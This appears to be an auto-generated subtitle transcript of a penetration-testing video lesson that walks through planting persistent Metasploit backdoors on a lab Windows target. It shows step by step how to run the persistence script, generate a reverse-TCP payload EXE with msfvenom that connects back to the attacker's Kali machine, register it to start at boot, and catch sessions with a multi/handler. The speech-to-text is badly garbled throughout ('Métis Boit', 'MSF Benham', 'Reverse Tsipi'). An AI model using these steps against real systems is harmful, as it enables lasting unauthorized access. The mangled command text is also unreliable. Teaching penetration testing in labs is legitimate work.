1
00:00:01,180 --> 00:00:05,200
Now, as I said before, creating a back door.

2
00:00:06,550 --> 00:00:08,000
Might be a good way to return.

3
00:00:09,040 --> 00:00:13,300
So I want to show you a few back doors presented in an interpreter.

4
00:00:14,300 --> 00:00:16,600
The first one is interpreter service.

5
00:00:17,930 --> 00:00:21,620
Or abbreviated to Matt, as we see.

6
00:00:23,660 --> 00:00:28,490
So it's a stand alone program, but it is implemented for interpretor.

7
00:00:29,800 --> 00:00:32,050
Now, word of warning here before you go any further.

8
00:00:33,470 --> 00:00:36,080
That service requires no authentication.

9
00:00:37,500 --> 00:00:41,870
So it's better to be careful because another one may connect to your back door.

10
00:00:43,040 --> 00:00:44,180
Now, next flavor.

11
00:00:45,170 --> 00:00:46,280
Persistent script.

12
00:00:47,580 --> 00:00:52,800
Métis Boit also has an interpreter script persistance, Dadaab.

13
00:00:53,850 --> 00:00:59,550
And that's going to create an interpreter service that will be available to you even if the remote system

14
00:00:59,550 --> 00:01:00,540
is rebooted.

15
00:01:02,090 --> 00:01:09,050
So this way, if the service you initially exploited is down or patched, you can still gain access

16
00:01:09,050 --> 00:01:09,710
to the system.

17
00:01:10,830 --> 00:01:14,130
Another word of warning here before you go any further.

18
00:01:14,940 --> 00:01:19,170
The persistent script requires no authentication.

19
00:01:20,480 --> 00:01:27,160
So that means that anyone that gains access to the port could access your back door as well.

20
00:01:28,080 --> 00:01:32,910
OK, so the next flavor is a post-modern resistance.

21
00:01:34,860 --> 00:01:37,440
Now it's more consistent than the other ones.

22
00:01:38,790 --> 00:01:45,270
Also, it allows you to create your own backdoor file from the beginning, but before running the module,

23
00:01:46,230 --> 00:01:50,350
you'll need to create the back door that contains the payload for us.

24
00:01:51,210 --> 00:01:53,750
So let's have a look at what we have.

25
00:01:55,190 --> 00:01:57,890
All right, so I've already gained access to the target system.

26
00:01:58,890 --> 00:02:03,810
And I'm going to use this session to perform persistency on my target.

27
00:02:05,130 --> 00:02:08,400
I'll use my first flavor, it's met service.

28
00:02:09,500 --> 00:02:11,810
But unfortunately, the script doesn't work properly at.

29
00:02:12,990 --> 00:02:16,950
So we're going to move on to the second one, the persistance script.

30
00:02:18,030 --> 00:02:22,860
So first, let's open up a new tab and go to them interpretor scripts directory.

31
00:02:24,140 --> 00:02:27,140
Type in them, persistance RB.

32
00:02:28,750 --> 00:02:32,380
Now, this is the interpreter persistent script.

33
00:02:34,020 --> 00:02:40,800
When you follow the codes, you will get the warning logic and here's the help menu code for the script.

34
00:02:42,050 --> 00:02:48,500
And because my interpreter scripts are now being made obsolete, you're not going to be able to display

35
00:02:48,500 --> 00:02:49,700
their help screens.

36
00:02:50,940 --> 00:02:54,030
So it's always a good practice to double check your parameters here.

37
00:02:55,210 --> 00:03:00,460
OK, quit them and return to my interpreter.

38
00:03:01,570 --> 00:03:04,480
Then type in run persistance.

39
00:03:07,640 --> 00:03:09,410
To start the agented boot time.

40
00:03:10,360 --> 00:03:13,100
P four, four, four, three.

41
00:03:13,510 --> 00:03:16,060
That's the port that the agent will connect back to.

42
00:03:17,270 --> 00:03:28,280
I five, it's a time interval for the agent to send reconnect probes are ten, ten to eleven is the

43
00:03:28,280 --> 00:03:30,230
connect back address for the agent.

44
00:03:30,350 --> 00:03:35,660
In this case, that's going to be the IP address of Colly so we can enter.

45
00:03:37,160 --> 00:03:44,720
And also, you can specify a parameter to automatically create the handler.

46
00:03:46,070 --> 00:03:48,080
But right now, we're going to do it manually.

47
00:03:49,290 --> 00:03:51,060
And we'll send the session to the background.

48
00:03:53,540 --> 00:03:55,580
Use, exploit.

49
00:03:56,510 --> 00:03:58,430
Multi handler.

50
00:04:00,990 --> 00:04:01,800
Said payload.

51
00:04:03,300 --> 00:04:04,620
To Windows.

52
00:04:05,670 --> 00:04:06,540
Interpretor.

53
00:04:07,990 --> 00:04:12,760
Reverse Tsipi set host.

54
00:04:14,040 --> 00:04:19,320
To 10, 10 to 11, the IP address of Carly.

55
00:04:20,460 --> 00:04:21,450
Said Outport.

56
00:04:22,650 --> 00:04:24,390
Two, four, four, four, three.

57
00:04:25,910 --> 00:04:27,710
Now, show me the options.

58
00:04:30,370 --> 00:04:30,700
Good.

59
00:04:30,970 --> 00:04:33,310
Everything looks a okay.

60
00:04:34,870 --> 00:04:36,610
So now exploit.

61
00:04:39,580 --> 00:04:42,370
And you'll see that the session opened immediately.

62
00:04:43,690 --> 00:04:49,510
But I really do need to be sure exactly, and you can also see.

63
00:04:51,110 --> 00:04:53,120
Big sessions.

64
00:04:55,490 --> 00:05:00,020
And here is your persistent session, overreport four four, four, three.

65
00:05:01,810 --> 00:05:03,970
Interact session for.

66
00:05:05,290 --> 00:05:06,220
Get Yoeli.

67
00:05:07,780 --> 00:05:08,710
Cesan vot.

68
00:05:10,310 --> 00:05:18,530
All right, see, so there is a persistent back door on Métis, voidable three now the back door will

69
00:05:18,530 --> 00:05:21,350
connect back to us when the system is awake.

70
00:05:22,950 --> 00:05:30,900
So let me warn you again about this script, it could cause problems, it has a potential will say to

71
00:05:30,900 --> 00:05:37,110
cause problems because someone else may connect to it, especially if you forget about it or you're

72
00:05:37,110 --> 00:05:38,250
just unaware.

73
00:05:38,790 --> 00:05:39,630
So remember that.

74
00:05:40,810 --> 00:05:42,670
So I'm going to go back to my original session.

75
00:05:45,580 --> 00:05:48,700
OK, so the next flavor is a post-modern.

76
00:05:50,030 --> 00:05:51,830
Persistance FXE.

77
00:05:57,970 --> 00:05:59,960
So this is the information for this module.

78
00:06:00,670 --> 00:06:03,270
Now it's more consistent than the other ones.

79
00:06:05,120 --> 00:06:08,780
Also, it allows you to create your own backdoor file from the beginning.

80
00:06:10,490 --> 00:06:17,180
But before running the module, you'll need to create the back door that contains the payload for us.

81
00:06:18,380 --> 00:06:19,850
So let's open up a new tab.

82
00:06:22,350 --> 00:06:24,120
Type MSF Benham.

83
00:06:25,850 --> 00:06:28,250
P and then your payload name.

84
00:06:33,560 --> 00:06:38,570
And the payload options now host equals I.P. address of Colly.

85
00:06:42,000 --> 00:06:45,630
Outport equals 444 to.

86
00:06:47,380 --> 00:06:54,760
And other options, FXE specifies the format of our final file.

87
00:06:55,900 --> 00:06:57,970
A eighty-six.

88
00:06:59,420 --> 00:07:01,640
Specifies the architecture of the final file.

89
00:07:03,280 --> 00:07:04,270
Platform windows.

90
00:07:06,550 --> 00:07:09,250
Specifies it as a Windows system file.

91
00:07:11,180 --> 00:07:15,350
Oh, defines the name of the produced payload file.

92
00:07:18,980 --> 00:07:20,920
Resistance that EXI.

93
00:07:29,090 --> 00:07:31,520
So let's go back to the interpreter session.

94
00:07:33,940 --> 00:07:40,960
Run post windows, manage persistance FXE.

95
00:07:43,210 --> 00:07:47,710
R e name equals persistence, that exi.

96
00:07:48,710 --> 00:07:52,880
So this is the name that will be shown in the task list of the target.

97
00:07:54,540 --> 00:07:58,140
Our XPath equals route desktop.

98
00:08:00,170 --> 00:08:02,120
Persistence that EXI.

99
00:08:05,140 --> 00:08:06,420
This is our payload file.

100
00:08:08,410 --> 00:08:09,940
Startup ecosystem.

101
00:08:12,070 --> 00:08:15,820
So this option enables a payload to start when the system is booted.

102
00:08:16,970 --> 00:08:18,290
OK, so hit enter.

103
00:08:22,010 --> 00:08:23,760
And the module successfully executed.

104
00:08:25,220 --> 00:08:28,760
So now let's start a handler for the module.

105
00:08:30,120 --> 00:08:32,520
So I'm already using the handler template.

106
00:08:34,230 --> 00:08:35,220
Show options.

107
00:08:38,260 --> 00:08:41,950
And I'll just set airport two four four four two.

108
00:08:44,410 --> 00:08:45,340
And then exploit.

109
00:08:47,090 --> 00:08:50,240
All right, so I'm going to reboot my voidable very quickly.

110
00:08:59,190 --> 00:09:05,040
Now, here, watch the material, your screen on the left pane, you can easily see this session open.

111
00:09:07,330 --> 00:09:08,380
That uid.

112
00:09:10,010 --> 00:09:10,820
It's disinfo.

113
00:09:13,320 --> 00:09:15,050
All righty, so this is what I want.

114
00:09:16,930 --> 00:09:21,710
But I also need to be sure put it in the background sessions.

115
00:09:22,410 --> 00:09:23,620
All right, so this is it.

116
00:09:24,490 --> 00:09:27,250
I have the connection on board four four four two.

117
00:09:28,590 --> 00:09:30,330
Now, when the system reboots.

118
00:09:31,470 --> 00:09:33,720
We'll get up a session on the target.